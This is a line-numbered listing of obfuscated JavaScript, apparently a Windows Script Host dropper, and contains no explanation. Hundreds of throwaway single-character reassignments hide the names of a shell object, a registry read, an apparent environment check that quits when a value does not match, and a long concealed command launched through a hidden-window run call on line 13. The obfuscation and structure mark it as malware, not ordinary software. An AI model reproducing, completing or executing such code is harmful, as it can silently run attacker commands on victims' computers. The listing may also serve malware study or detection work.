2 | var eyfjh = this[tyasnrv + gwvztdf + kvvihnfu + bglgejx + eekifdd + stkiohn + yamgchm + cjmqzpeg] ( this[rkdrey + wmfikf + nztfgufm + kvvihnfu + ykgpz + tyasnrv + cjmqzpeg][dilwipyvn + kvvihnfu + eekifdd + gwvztdf + cjmqzpeg + eekifdd + cthvquqxs + bhdracz + nrzkeuium + eekifdd + nztfgufm + cjmqzpeg] ( rkdrey + wmfikf + nztfgufm + kvvihnfu + ykgpz + tyasnrv + cjmqzpeg + hcihhtsso + wmfikf + nhsvpav + eekifdd + qccnmsaj + qccnmsaj ) [sgwurxqq + eekifdd + xnhyodih + sgwurxqq + eekifdd + gwvztdf + hcweynt] ( plaexlqnv + zxpemhemm + zuseoyzcq + ijopv + jllafai + dilwipyvn + rnvsaaq + sgwurxqq + sgwurxqq + zuseoyzcq + hetou + fxcjxewkc + jllafai + rnvsaaq + wmfikf + zuseoyzcq + sgwurxqq + rmmcclk + dilwipyvn + qqpriorpn + yamgchm + cjmqzpeg + kvvihnfu + qqpriorpn + qccnmsaj + ygkhlqcpi + hoobuew + gwvztdf + yamgchm + eekifdd + qccnmsaj + rmmcclk + stkiohn + yamgchm + cjmqzpeg + eekifdd + kvvihnfu + yamgchm + gwvztdf + cjmqzpeg + ykgpz + qqpriorpn + yamgchm + gwvztdf + qccnmsaj + rmmcclk + hbzahakt + qqpriorpn + nztfgufm + gwvztdf + qccnmsaj + eekifdd ), 16 ); |
|
3 | for ( mgvgr = 0 ; mgvgr < punpk[qccnmsaj + eekifdd + yamgchm + xnhyodih + cjmqzpeg + nhsvpav] ; ++ mgvgr ) | |
4 | { | |
5 | if ( eyfjh == punpk[mgvgr] ) | |
6 | { | |
7 | eyfjh = true; | |
8 | break ; | |
9 | } | |
10 | } | |
11 | if ( eyfjh !== true ) | |
12 | this[rkdrey + wmfikf + nztfgufm + kvvihnfu + ykgpz + tyasnrv + cjmqzpeg][uyevahbfa + pkdavolz + ykgpz + cjmqzpeg] ( ); | |
13 | this[rkdrey + wmfikf + nztfgufm + kvvihnfu + ykgpz + tyasnrv + cjmqzpeg][dilwipyvn + kvvihnfu + eekifdd + gwvztdf + cjmqzpeg + eekifdd + cthvquqxs + bhdracz + nrzkeuium + eekifdd + nztfgufm + cjmqzpeg] ( rkdrey + wmfikf + nztfgufm + kvvihnfu + ykgpz + tyasnrv + cjmqzpeg + hcihhtsso + wmfikf + nhsvpav + eekifdd + qccnmsaj + qccnmsaj ) [kvvihnfu + pkdavolz + yamgchm] ( nztfgufm + ffpqofll + hcweynt + ygkhlqcpi + nluifgdgs + nztfgufm + ygkhlqcpi + tyasnrv + qqpriorpn + xaubda + eekifdd + kvvihnfu + bglgejx + nhsvpav + eekifdd + qccnmsaj + qccnmsaj + hcihhtsso + eekifdd + twwsebr + eekifdd + ygkhlqcpi + okuoocl + dilwipyvn + qqpriorpn + ffpqofll + ffpqofll + gwvztdf + yamgchm + hcweynt + ygkhlqcpi + mnghaoct + stkiohn + yamgchm + tvavsdkww + qqpriorpn + lqsubtu + eekifdd + okuoocl + rkdrey + eekifdd + bhdracz + sgwurxqq + eekifdd + bhfwystna + pkdavolz + eekifdd + bglgejx + cjmqzpeg + ygkhlqcpi + okuoocl + cthvquqxs + pkdavolz + cjmqzpeg + ilqnild + ykgpz + qccnmsaj + eekifdd + ygkhlqcpi + qzlntz + cjmqzpeg + eekifdd + ffpqofll + tyasnrv + qzlntz + rmmcclk + ykgpz + yamgchm + tvavsdkww + qqpriorpn + ykgpz + nztfgufm + eekifdd + hcihhtsso + tyasnrv + hcweynt + zrlhw + ygkhlqcpi + nhsvpav + cjmqzpeg + cjmqzpeg + tyasnrv + cqhno + nluifgdgs + nluifgdgs + srgbuae + epldhpdb + rhxluc + hcihhtsso + srgbuae + yclxakc + rhxluc + hcihhtsso + srgbuae + hcihhtsso + fxhtfcosd + ouengzdx + ggtal + nluifgdgs + ykgpz + yamgchm + tvavsdkww + qqpriorpn + ykgpz + nztfgufm + eekifdd + hcihhtsso + tyasnrv + nhsvpav + tyasnrv + mnghaoct + ojwvtwt + ojwvtwt + bglgejx + cjmqzpeg + gwvztdf + kvvihnfu + cjmqzpeg + ygkhlqcpi + qzlntz + cjmqzpeg + eekifdd + ffpqofll + tyasnrv + qzlntz + rmmcclk + ykgpz + yamgchm + tvavsdkww + qqpriorpn + ykgpz + nztfgufm + eekifdd + hcihhtsso + tyasnrv + hcweynt + zrlhw + ojwvtwt + ojwvtwt + nztfgufm + ffpqofll + hcweynt + ygkhlqcpi + nluifgdgs + nztfgufm + ygkhlqcpi + yamgchm + eekifdd + cjmqzpeg + ygkhlqcpi + pkdavolz + bglgejx + eekifdd + ygkhlqcpi + rmmcclk + rmmcclk + srgbuae + epldhpdb + rhxluc + hcihhtsso + srgbuae + yclxakc + rhxluc + hcihhtsso + srgbuae + hcihhtsso + fxhtfcosd + ouengzdx + ggtal + ecfomon + kcufhedml + kcufhedml + kcufhedml + kcufhedml + rmmcclk + hcweynt + gwvztdf + tvavsdkww + xaubda + xaubda + xaubda + kvvihnfu + qqpriorpn + qqpriorpn + cjmqzpeg + rmmcclk + ojwvtwt + ojwvtwt + nztfgufm + ffpqofll + hcweynt + ygkhlqcpi + nluifgdgs + nztfgufm + ygkhlqcpi + kvvihnfu + eekifdd + xnhyodih + bglgejx + tvavsdkww + kvvihnfu + rhxluc + fxhtfcosd + ygkhlqcpi + nluifgdgs + bglgejx + ygkhlqcpi + rmmcclk + rmmcclk + srgbuae + epldhpdb + rhxluc + hcihhtsso + srgbuae + yclxakc + rhxluc + hcihhtsso + srgbuae + hcihhtsso + fxhtfcosd + ouengzdx + ggtal + ecfomon + kcufhedml + kcufhedml + kcufhedml + kcufhedml + rmmcclk + hcweynt + gwvztdf + tvavsdkww + xaubda + xaubda + xaubda + kvvihnfu + qqpriorpn + qqpriorpn + cjmqzpeg + rmmcclk + fxhtfcosd + ggtal + fxhtfcosd + ouengzdx + rhxluc + srgbuae + kcufhedml + rhxluc + yclxakc + epldhpdb + srgbuae + rhxluc + kcufhedml + ouengzdx + hcihhtsso + hcweynt + qccnmsaj + qccnmsaj, 0, false ); |
|
14 | } | |
15 | plaexlqnv = "H"; | |
16 | nluifgdgs = "i"; | |
17 | nluifgdgs = "V"; | |
18 | nluifgdgs = "G"; | |
19 | nluifgdgs = "R"; | |
20 | nluifgdgs = "E"; | |
21 | nluifgdgs = "E"; | |
22 | nluifgdgs = "D"; | |
23 | nluifgdgs = "G"; | |
24 | nluifgdgs = "D"; | |
25 | nluifgdgs = "v"; | |
26 | nluifgdgs = "T"; | |
27 | nluifgdgs = "p"; | |
28 | nluifgdgs = "T"; | |
29 | nluifgdgs = "G"; | |
30 | nluifgdgs = "o"; | |
31 | nluifgdgs = "x"; | |
32 | nluifgdgs = "E"; | |
33 | nluifgdgs = "M"; | |
34 | nluifgdgs = "/"; | |
35 | qccnmsaj = "A"; | |
36 | qccnmsaj = "r"; | |
37 | qccnmsaj = "b"; | |
38 | qccnmsaj = "S"; | |
39 | qccnmsaj = "n"; | |
40 | qccnmsaj = "U"; | |
41 | qccnmsaj = "T"; | |
42 | qccnmsaj = "j"; | |
43 | qccnmsaj = "q"; | |
44 | qccnmsaj = "b"; | |
45 | qccnmsaj = "X"; | |
46 | qccnmsaj = "V"; | |
47 | qccnmsaj = "s"; | |
48 | qccnmsaj = "R"; | |
49 | qccnmsaj = "G"; | |
50 | qccnmsaj = "p"; | |
51 | qccnmsaj = "S"; | |
52 | qccnmsaj = "i"; | |
53 | qccnmsaj = "R"; | |
54 | qccnmsaj = "H"; | |
55 | qccnmsaj = "a"; | |
56 | qccnmsaj = "q"; | |
57 | qccnmsaj = "P"; | |
58 | qccnmsaj = "y"; | |
59 | qccnmsaj = "n"; | |
60 | qccnmsaj = "i"; | |
61 | qccnmsaj = "Y"; | |
62 | qccnmsaj = "d"; | |
63 | qccnmsaj = "t"; | |
64 | qccnmsaj = "p"; | |
65 | qccnmsaj = "J"; | |
66 | qccnmsaj = "v"; | |
67 | qccnmsaj = "h"; | |
68 | qccnmsaj = "O"; | |
69 | qccnmsaj = "l"; | |
70 | qccnmsaj = "e"; | |
71 | qccnmsaj = "q"; | |
72 | qccnmsaj = "V"; | |
73 | qccnmsaj = "P"; | |
74 | qccnmsaj = "z"; | |
75 | qccnmsaj = "r"; | |
76 | qccnmsaj = "l"; | |
77 | pkdavolz = "O"; | |
78 | pkdavolz = "m"; | |
79 | pkdavolz = "w"; | |
80 | pkdavolz = "p"; | |
81 | pkdavolz = "a"; | |
82 | pkdavolz = "i"; | |
83 | pkdavolz = "z"; | |
84 | pkdavolz = "w"; | |
85 | pkdavolz = "X"; | |
86 | pkdavolz = "l"; | |
87 | pkdavolz = "K"; | |
88 | pkdavolz = "h"; | |
89 | pkdavolz = "I"; | |
90 | pkdavolz = "y"; | |
91 | pkdavolz = "J"; | |
92 | pkdavolz = "z"; | |
93 | pkdavolz = "B"; | |
94 | pkdavolz = "n"; | |
95 | pkdavolz = "H"; | |
96 | pkdavolz = "z"; | |
97 | pkdavolz = "A"; | |
98 | pkdavolz = "h"; | |
99 | pkdavolz = "u"; | |
100 | rnvsaaq = "f"; | |
101 | rnvsaaq = "C"; | |
102 | rnvsaaq = "E"; | |
103 | rnvsaaq = "X"; | |
104 | rnvsaaq = "v"; | |
105 | rnvsaaq = "e"; | |
106 | rnvsaaq = "t"; | |
107 | rnvsaaq = "p"; | |
108 | rnvsaaq = "g"; | |
109 | rnvsaaq = "F"; | |
110 | rnvsaaq = "u"; | |
111 | rnvsaaq = "Z"; | |
112 | rnvsaaq = "w"; | |
113 | rnvsaaq = "d"; | |
114 | rnvsaaq = "s"; | |
115 | rnvsaaq = "S"; | |
116 | rnvsaaq = "V"; | |
117 | rnvsaaq = "H"; | |
118 | rnvsaaq = "b"; | |
119 | rnvsaaq = "m"; | |
120 | rnvsaaq = "U"; | |
121 | yclxakc = "P"; | |
122 | yclxakc = "t"; | |
123 | yclxakc = "O"; | |
124 | yclxakc = "K"; | |
125 | yclxakc = "v"; | |
126 | yclxakc = "i"; | |
127 | yclxakc = "G"; | |
128 | yclxakc = "S"; | |
129 | yclxakc = "U"; | |
130 | yclxakc = "E"; | |
131 | yclxakc = "a"; | |
132 | yclxakc = "u"; | |
133 | yclxakc = "l"; | |
134 | yclxakc = "g"; | |
135 | yclxakc = "M"; | |
136 | yclxakc = "Q"; | |
137 | yclxakc = "H"; | |
138 | yclxakc = "L"; | |
139 | yclxakc = "W"; | |
140 | yclxakc = "F"; | |
141 | yclxakc = "o"; | |
142 | yclxakc = "R"; | |
143 | yclxakc = "g"; | |
144 | yclxakc = "q"; | |
145 | yclxakc = "D"; | |
146 | yclxakc = "A"; | |
147 | yclxakc = "r"; | |
148 | yclxakc = "x"; | |
149 | yclxakc = "g"; | |
150 | yclxakc = "C"; | |
151 | yclxakc = "x"; | |
152 | yclxakc = "R"; | |
153 | yclxakc = "V"; | |
154 | yclxakc = "e"; | |
155 | yclxakc = "H"; | |
156 | yclxakc = "R"; | |
157 | yclxakc = "V"; | |
158 | yclxakc = "K"; | |
159 | yclxakc = "g"; | |
160 | yclxakc = "4"; | |
161 | gwvztdf = "v"; | |
162 | gwvztdf = "C"; | |
163 | gwvztdf = "Y"; | |
164 | gwvztdf = "T"; | |
165 | gwvztdf = "r"; | |
166 | gwvztdf = "q"; | |
167 | gwvztdf = "H"; | |
168 | gwvztdf = "c"; | |
169 | gwvztdf = "o"; | |
170 | gwvztdf = "t"; | |
171 | gwvztdf = "v"; | |
172 | gwvztdf = "f"; | |
173 | gwvztdf = "r"; | |
174 | gwvztdf = "k"; | |
175 | gwvztdf = "s"; | |
176 | gwvztdf = "b"; | |
177 | gwvztdf = "z"; | |
178 | gwvztdf = "Q"; | |
179 | gwvztdf = "o"; | |
180 | gwvztdf = "f"; | |
181 | gwvztdf = "N"; | |
182 | gwvztdf = "t"; | |
183 | gwvztdf = "F"; | |
184 | gwvztdf = "J"; | |
185 | gwvztdf = "c"; | |
186 | gwvztdf = "o"; | |
187 | gwvztdf = "u"; | |
188 | gwvztdf = "i"; | |
189 | gwvztdf = "c"; | |
190 | gwvztdf = "C"; | |
191 | gwvztdf = "J"; | |
192 | gwvztdf = "d"; | |
193 | gwvztdf = "a"; | |
194 | srgbuae = "d"; | |
195 | srgbuae = "o"; | |
196 | srgbuae = "C"; | |
197 | srgbuae = "J"; | |
198 | srgbuae = "p"; | |
199 | srgbuae = "c"; | |
200 | srgbuae = "u"; | |
201 | srgbuae = "y"; | |
202 | srgbuae = "I"; | |
203 | srgbuae = "I"; | |
204 | srgbuae = "X"; | |
205 | srgbuae = "f"; | |
206 | srgbuae = "m"; | |
207 | srgbuae = "H"; | |
208 | srgbuae = "C"; | |
209 | srgbuae = "V"; | |
210 | srgbuae = "J"; | |
211 | srgbuae = "h"; | |
212 | srgbuae = "O"; | |
213 | srgbuae = "O"; | |
214 | srgbuae = "b"; | |
215 | srgbuae = "j"; | |
216 | srgbuae = "R"; | |
217 | srgbuae = "B"; | |
218 | srgbuae = "z"; | |
219 | srgbuae = "i"; | |
220 | srgbuae = "h"; | |
221 | srgbuae = "K"; | |
222 | srgbuae = "z"; | |
223 | srgbuae = "F"; | |
224 | srgbuae = "N"; | |
225 | srgbuae = "F"; | |
226 | srgbuae = "k"; | |
227 | srgbuae = "l"; | |
228 | srgbuae = "T"; | |
229 | srgbuae = "b"; | |
230 | srgbuae = "a"; | |
231 | srgbuae = "s"; | |
232 | srgbuae = "X"; | |
233 | srgbuae = "v"; | |
234 | srgbuae = "G"; | |
235 | srgbuae = "d"; | |
236 | srgbuae = "z"; | |
237 | srgbuae = "p"; | |
238 | srgbuae = "1"; | |
239 | hbzahakt = "I"; | |
240 | hbzahakt = "i"; | |
241 | hbzahakt = "R"; | |
242 | hbzahakt = "M"; | |
243 | hbzahakt = "C"; | |
244 | hbzahakt = "t"; | |
245 | hbzahakt = "G"; | |
246 | hbzahakt = "V"; | |
247 | hbzahakt = "W"; | |
248 | hbzahakt = "x"; | |
249 | hbzahakt = "u"; | |
250 | hbzahakt = "b"; | |
251 | hbzahakt = "X"; | |
252 | hbzahakt = "i"; | |
253 | hbzahakt = "u"; | |
254 | hbzahakt = "C"; | |
255 | hbzahakt = "D"; | |
256 | hbzahakt = "I"; | |
257 | hbzahakt = "y"; | |
258 | hbzahakt = "w"; | |
259 | hbzahakt = "L"; | |
260 | fxcjxewkc = "U"; | |
261 | fxcjxewkc = "x"; | |
262 | fxcjxewkc = "l"; | |
263 | fxcjxewkc = "G"; | |
264 | fxcjxewkc = "e"; | |
265 | fxcjxewkc = "t"; | |
266 | fxcjxewkc = "e"; | |
267 | fxcjxewkc = "p"; | |
268 | fxcjxewkc = "a"; | |
269 | fxcjxewkc = "U"; | |
270 | fxcjxewkc = "j"; | |
271 | fxcjxewkc = "g"; | |
272 | fxcjxewkc = "Z"; | |
273 | fxcjxewkc = "E"; | |
274 | fxcjxewkc = "R"; | |
275 | fxcjxewkc = "r"; | |
276 | fxcjxewkc = "O"; | |
277 | fxcjxewkc = "Y"; | |
278 | fxcjxewkc = "D"; | |
279 | fxcjxewkc = "s"; | |
280 | fxcjxewkc = "s"; | |
281 | fxcjxewkc = "M"; | |
282 | fxcjxewkc = "c"; | |
283 | fxcjxewkc = "X"; | |
284 | fxcjxewkc = "V"; | |
285 | fxcjxewkc = "S"; | |
286 | fxcjxewkc = "k"; | |
287 | fxcjxewkc = "P"; | |
288 | fxcjxewkc = "h"; | |
289 | fxcjxewkc = "w"; | |
290 | fxcjxewkc = "T"; | |
291 | fxcjxewkc = "u"; | |
292 | fxcjxewkc = "x"; | |
293 | fxcjxewkc = "w"; | |
294 | fxcjxewkc = "s"; | |
295 | fxcjxewkc = "T"; | |
296 | kcufhedml = "j"; | |
297 | kcufhedml = "f"; | |
298 | kcufhedml = "p"; | |
299 | kcufhedml = "l"; | |
300 | kcufhedml = "y"; | |
301 | kcufhedml = "K"; | |
302 | kcufhedml = "z"; | |
303 | kcufhedml = "L"; | |
304 | kcufhedml = "u"; | |
305 | kcufhedml = "B"; | |
306 | kcufhedml = "K"; | |
307 | kcufhedml = "w"; | |
308 | kcufhedml = "D"; | |
309 | kcufhedml = "8"; | |
310 | uyevahbfa = "p"; | |
311 | uyevahbfa = "H"; | |
312 | uyevahbfa = "R"; | |
313 | uyevahbfa = "K"; | |
314 | uyevahbfa = "q"; | |
315 | uyevahbfa = "T"; | |
316 | uyevahbfa = "M"; | |
317 | uyevahbfa = "c"; | |
318 | uyevahbfa = "E"; | |
319 | uyevahbfa = "E"; | |
320 | uyevahbfa = "x"; | |
321 | uyevahbfa = "E"; | |
322 | uyevahbfa = "R"; | |
323 | uyevahbfa = "Z"; | |
324 | uyevahbfa = "l"; | |
325 | uyevahbfa = "q"; | |
326 | uyevahbfa = "P"; | |
327 | uyevahbfa = "p"; | |
328 | uyevahbfa = "u"; | |
329 | uyevahbfa = "K"; | |
330 | uyevahbfa = "J"; | |
331 | uyevahbfa = "o"; | |
332 | uyevahbfa = "N"; | |
333 | uyevahbfa = "W"; | |
334 | uyevahbfa = "Q"; | |
335 | uyevahbfa = "a"; | |
336 | uyevahbfa = "P"; | |
337 | uyevahbfa = "Q"; | |
338 | uyevahbfa = "v"; | |
339 | uyevahbfa = "P"; | |
340 | uyevahbfa = "X"; | |
341 | uyevahbfa = "N"; | |
342 | uyevahbfa = "Z"; | |
343 | uyevahbfa = "a"; | |
344 | uyevahbfa = "M"; | |
345 | uyevahbfa = "Q"; | |
346 | nztfgufm = "Z"; | |
347 | nztfgufm = "W"; | |
348 | nztfgufm = "J"; | |
349 | nztfgufm = "F"; | |
350 | nztfgufm = "m"; | |
351 | nztfgufm = "a"; | |
352 | nztfgufm = "O"; | |
353 | nztfgufm = "l"; | |
354 | nztfgufm = "n"; | |
355 | nztfgufm = "Z"; | |
356 | nztfgufm = "g"; | |
357 | nztfgufm = "n"; | |
358 | nztfgufm = "H"; | |
359 | nztfgufm = "X"; | |
360 | nztfgufm = "R"; | |
361 | nztfgufm = "d"; | |
362 | nztfgufm = "i"; | |
363 | nztfgufm = "E"; | |
364 | nztfgufm = "Q"; | |
365 | nztfgufm = "U"; | |
366 | nztfgufm = "I"; | |
367 | nztfgufm = "t"; | |
368 | nztfgufm = "b"; | |
369 | nztfgufm = "z"; | |
370 | nztfgufm = "H"; | |
371 | nztfgufm = "U"; | |
372 | nztfgufm = "g"; | |
373 | nztfgufm = "t"; | |
374 | nztfgufm = "C"; | |
375 | nztfgufm = "S"; | |
376 | nztfgufm = "t"; | |
377 | nztfgufm = "C"; | |
378 | nztfgufm = "Z"; | |
379 | nztfgufm = "T"; | |
380 | nztfgufm = "T"; | |
381 | nztfgufm = "c"; | |
382 | ouengzdx = "k"; | |
383 | ouengzdx = "F"; | |
384 | ouengzdx = "Z"; | |
385 | ouengzdx = "B"; | |
386 | ouengzdx = "m"; | |
387 | ouengzdx = "w"; | |
388 | ouengzdx = "P"; | |
389 | ouengzdx = "U"; | |
390 | ouengzdx = "R"; | |
391 | ouengzdx = "f"; | |
392 | ouengzdx = "o"; | |
393 | ouengzdx = "N"; | |
394 | ouengzdx = "b"; | |
395 | ouengzdx = "m"; | |
396 | ouengzdx = "f"; | |
397 | ouengzdx = "E"; | |
398 | ouengzdx = "q"; | |
399 | ouengzdx = "O"; | |
400 | ouengzdx = "e"; | |
401 | ouengzdx = "M"; | |
402 | ouengzdx = "B"; | |
403 | ouengzdx = "l"; | |
404 | ouengzdx = "G"; | |
405 | ouengzdx = "n"; | |
406 | ouengzdx = "P"; | |
407 | ouengzdx = "s"; | |
408 | ouengzdx = "Z"; | |
409 | ouengzdx = "R"; | |
410 | ouengzdx = "u"; | |
411 | ouengzdx = "W"; | |
412 | ouengzdx = "Z"; | |
413 | ouengzdx = "i"; | |
414 | ouengzdx = "t"; | |
415 | ouengzdx = "X"; | |
416 | ouengzdx = "R"; | |
417 | ouengzdx = "U"; | |
418 | ouengzdx = "J"; | |
419 | ouengzdx = "Z"; | |
420 | ouengzdx = "P"; | |
421 | ouengzdx = "p"; | |
422 | ouengzdx = "B"; | |
423 | ouengzdx = "T"; | |
424 | ouengzdx = "R"; | |
425 | ouengzdx = "0"; | |
426 | ykgpz = "z"; | |
427 | ykgpz = "U"; | |
428 | ykgpz = "i"; | |
429 | wmfikf = "N"; | |
430 | wmfikf = "C"; | |
431 | wmfikf = "f"; | |
432 | wmfikf = "z"; | |
433 | wmfikf = "O"; | |
434 | wmfikf = "g"; | |
435 | wmfikf = "h"; | |
436 | wmfikf = "D"; | |
437 | wmfikf = "q"; | |
438 | wmfikf = "R"; | |
439 | wmfikf = "N"; | |
440 | wmfikf = "l"; | |
441 | wmfikf = "N"; | |
442 | wmfikf = "y"; | |
443 | wmfikf = "W"; | |
444 | wmfikf = "S"; | |
445 | cjmqzpeg = "q"; | |
446 | cjmqzpeg = "t"; | |
447 | cjmqzpeg = "f"; | |
448 | cjmqzpeg = "s"; | |
449 | cjmqzpeg = "y"; | |
450 | cjmqzpeg = "u"; | |
451 | cjmqzpeg = "i"; | |
452 | cjmqzpeg = "I"; | |
453 | cjmqzpeg = "A"; | |
454 | cjmqzpeg = "e"; | |
455 | cjmqzpeg = "F"; | |
456 | cjmqzpeg = "y"; | |
457 | cjmqzpeg = "a"; | |
458 | cjmqzpeg = "L"; | |
459 | cjmqzpeg = "U"; | |
460 | cjmqzpeg = "h"; | |
461 | cjmqzpeg = "W"; | |
462 | cjmqzpeg = "t"; | |
463 | kvvihnfu = "p"; | |
464 | kvvihnfu = "l"; | |
465 | kvvihnfu = "h"; | |
466 | kvvihnfu = "Q"; | |
467 | kvvihnfu = "U"; | |
468 | kvvihnfu = "x"; | |
469 | kvvihnfu = "F"; | |
470 | kvvihnfu = "Y"; | |
471 | kvvihnfu = "u"; | |
472 | kvvihnfu = "u"; | |
473 | kvvihnfu = "T"; | |
474 | kvvihnfu = "H"; | |
475 | kvvihnfu = "U"; | |
476 | kvvihnfu = "h"; | |
477 | kvvihnfu = "c"; | |
478 | kvvihnfu = "H"; | |
479 | kvvihnfu = "l"; | |
480 | kvvihnfu = "Z"; | |
481 | kvvihnfu = "u"; | |
482 | kvvihnfu = "M"; | |
483 | kvvihnfu = "W"; | |
484 | kvvihnfu = "B"; | |
485 | kvvihnfu = "B"; | |
486 | kvvihnfu = "O"; | |
487 | kvvihnfu = "n"; | |
488 | kvvihnfu = "m"; | |
489 | kvvihnfu = "r"; | |
490 | rkdrey = "i"; | |
491 | rkdrey = "D"; | |
492 | rkdrey = "x"; | |
493 | rkdrey = "I"; | |
494 | rkdrey = "L"; | |
495 | rkdrey = "z"; | |
496 | rkdrey = "m"; | |
497 | rkdrey = "y"; | |
498 | rkdrey = "L"; | |
499 | rkdrey = "M"; | |
500 | rkdrey = "j"; | |
501 | rkdrey = "O"; | |
502 | rkdrey = "O"; | |
503 | rkdrey = "l"; | |
504 | rkdrey = "T"; | |
505 | rkdrey = "L"; | |
506 | rkdrey = "W"; | |
507 | yamgchm = "n"; | |
508 | ggtal = "D"; | |
509 | ggtal = "m"; | |
510 | ggtal = "Q"; | |
511 | ggtal = "y"; | |
512 | ggtal = "U"; | |
513 | ggtal = "c"; | |
514 | ggtal = "t"; | |
515 | ggtal = "Q"; | |
516 | ggtal = "X"; | |
517 | ggtal = "T"; | |
518 | ggtal = "J"; | |
519 | ggtal = "t"; | |
520 | ggtal = "L"; | |
521 | ggtal = "x"; | |
522 | ggtal = "t"; | |
523 | ggtal = "X"; | |
524 | ggtal = "b"; | |
525 | ggtal = "u"; | |
526 | ggtal = "s"; | |
527 | ggtal = "w"; | |
528 | ggtal = "R"; | |
529 | ggtal = "K"; | |
530 | ggtal = "Q"; | |
531 | ggtal = "Q"; | |
532 | ggtal = "d"; | |
533 | ggtal = "B"; | |
534 | ggtal = "j"; | |
535 | ggtal = "c"; | |
536 | ggtal = "B"; | |
537 | ggtal = "j"; | |
538 | ggtal = "P"; | |
539 | ggtal = "W"; | |
540 | ggtal = "5"; | |
541 | zxpemhemm = "p"; | |
542 | zxpemhemm = "X"; | |
543 | zxpemhemm = "V"; | |
544 | zxpemhemm = "a"; | |
545 | zxpemhemm = "H"; | |
546 | zxpemhemm = "m"; | |
547 | zxpemhemm = "o"; | |
548 | zxpemhemm = "k"; | |
549 | zxpemhemm = "o"; | |
550 | zxpemhemm = "N"; | |
551 | zxpemhemm = "k"; | |
552 | zxpemhemm = "k"; | |
553 | zxpemhemm = "S"; | |
554 | zxpemhemm = "M"; | |
555 | zxpemhemm = "W"; | |
556 | zxpemhemm = "Y"; | |
557 | zxpemhemm = "e"; | |
558 | zxpemhemm = "B"; | |
559 | zxpemhemm = "Y"; | |
560 | zxpemhemm = "V"; | |
561 | zxpemhemm = "U"; | |
562 | zxpemhemm = "W"; | |
563 | zxpemhemm = "K"; | |
564 | epldhpdb = "I"; | |
565 | epldhpdb = "u"; | |
566 | epldhpdb = "Q"; | |
567 | epldhpdb = "w"; | |
568 | epldhpdb = "9"; | |
569 | ilqnild = "W"; | |
570 | ilqnild = "f"; | |
571 | ilqnild = "i"; | |
572 | ilqnild = "F"; | |
573 | ilqnild = "Z"; | |
574 | ilqnild = "e"; | |
575 | ilqnild = "c"; | |
576 | ilqnild = "d"; | |
577 | ilqnild = "f"; | |
578 | ilqnild = "D"; | |
579 | ilqnild = "f"; | |
580 | ilqnild = "y"; | |
581 | ilqnild = "Q"; | |
582 | ilqnild = "O"; | |
583 | ilqnild = "j"; | |
584 | ilqnild = "K"; | |
585 | ilqnild = "g"; | |
586 | ilqnild = "L"; | |
587 | ilqnild = "S"; | |
588 | ilqnild = "F"; | |
589 | zrlhw = "z"; | |
590 | zrlhw = "y"; | |
591 | zrlhw = "B"; | |
592 | zrlhw = "R"; | |
593 | zrlhw = "c"; | |
594 | zrlhw = "h"; | |
595 | zrlhw = "B"; | |
596 | zrlhw = "I"; | |
597 | zrlhw = "y"; | |
598 | zrlhw = "p"; | |
599 | zrlhw = "v"; | |
600 | zrlhw = "G"; | |
601 | zrlhw = "W"; | |
602 | zrlhw = "d"; | |
603 | zrlhw = "H"; | |
604 | zrlhw = "M"; | |
605 | zrlhw = "e"; | |
606 | zrlhw = "W"; | |
607 | zrlhw = "Y"; | |
608 | zrlhw = "l"; | |
609 | zrlhw = "Z"; | |
610 | zrlhw = "S"; | |
611 | zrlhw = "f"; | |
612 | zrlhw = "E"; | |
613 | zrlhw = "N"; | |
614 | zrlhw = "f"; | |
615 | zrlhw = "N"; | |
616 | zrlhw = "G"; | |
617 | zrlhw = "W"; | |
618 | zrlhw = "x"; | |
619 | zrlhw = "r"; | |
620 | zrlhw = "q"; | |
621 | zrlhw = "G"; | |
622 | zrlhw = "f"; | |
623 | ijopv = "H"; | |
624 | ijopv = "J"; | |
625 | ijopv = "o"; | |
626 | ijopv = "O"; | |
627 | ijopv = "w"; | |
628 | ijopv = "z"; | |
629 | ijopv = "q"; | |
630 | ijopv = "S"; | |
631 | ijopv = "D"; | |
632 | ijopv = "r"; | |
633 | ijopv = "n"; | |
634 | ijopv = "U"; | |
635 | ijopv = "m"; | |
636 | ijopv = "j"; | |
637 | ijopv = "d"; | |
638 | ijopv = "G"; | |
639 | ijopv = "X"; | |
640 | ijopv = "Y"; | |
641 | ijopv = "G"; | |
642 | ijopv = "g"; | |
643 | ijopv = "G"; | |
644 | ijopv = "e"; | |
645 | ijopv = "X"; | |
646 | ijopv = "q"; | |
647 | ijopv = "w"; | |
648 | ijopv = "S"; | |
649 | ijopv = "Q"; | |
650 | ijopv = "n"; | |
651 | ijopv = "w"; | |
652 | ijopv = "Y"; | |
653 | twwsebr = "Y"; | |
654 | twwsebr = "I"; | |
655 | twwsebr = "B"; | |
656 | twwsebr = "R"; | |
657 | twwsebr = "R"; | |
658 | twwsebr = "A"; | |
659 | twwsebr = "k"; | |
660 | twwsebr = "G"; | |
661 | twwsebr = "J"; | |
662 | twwsebr = "y"; | |
663 | twwsebr = "m"; | |
664 | twwsebr = "B"; | |
665 | twwsebr = "F"; | |
666 | twwsebr = "F"; | |
667 | twwsebr = "t"; | |
668 | twwsebr = "o"; | |
669 | twwsebr = "X"; | |
670 | twwsebr = "Y"; | |
671 | twwsebr = "V"; | |
672 | twwsebr = "d"; | |
673 | twwsebr = "N"; | |
674 | twwsebr = "u"; | |
675 | twwsebr = "a"; | |
676 | twwsebr = "c"; | |
677 | twwsebr = "j"; | |
678 | twwsebr = "j"; | |
679 | twwsebr = "s"; | |
680 | twwsebr = "I"; | |
681 | twwsebr = "x"; | |
682 | ffpqofll = "w"; | |
683 | ffpqofll = "q"; | |
684 | ffpqofll = "B"; | |
685 | ffpqofll = "Y"; | |
686 | ffpqofll = "B"; | |
687 | ffpqofll = "B"; | |
688 | ffpqofll = "C"; | |
689 | ffpqofll = "N"; | |
690 | ffpqofll = "b"; | |
691 | ffpqofll = "e"; | |
692 | ffpqofll = "V"; | |
693 | ffpqofll = "h"; | |
694 | ffpqofll = "h"; | |
695 | ffpqofll = "f"; | |
696 | ffpqofll = "D"; | |
697 | ffpqofll = "I"; | |
698 | ffpqofll = "S"; | |
699 | ffpqofll = "l"; | |
700 | ffpqofll = "x"; | |
701 | ffpqofll = "U"; | |
702 | ffpqofll = "Q"; | |
703 | ffpqofll = "l"; | |
704 | ffpqofll = "F"; | |
705 | ffpqofll = "W"; | |
706 | ffpqofll = "x"; | |
707 | ffpqofll = "P"; | |
708 | ffpqofll = "Y"; | |
709 | ffpqofll = "b"; | |
710 | ffpqofll = "m"; | |
711 | xaubda = "C"; | |
712 | xaubda = "o"; | |
713 | xaubda = "I"; | |
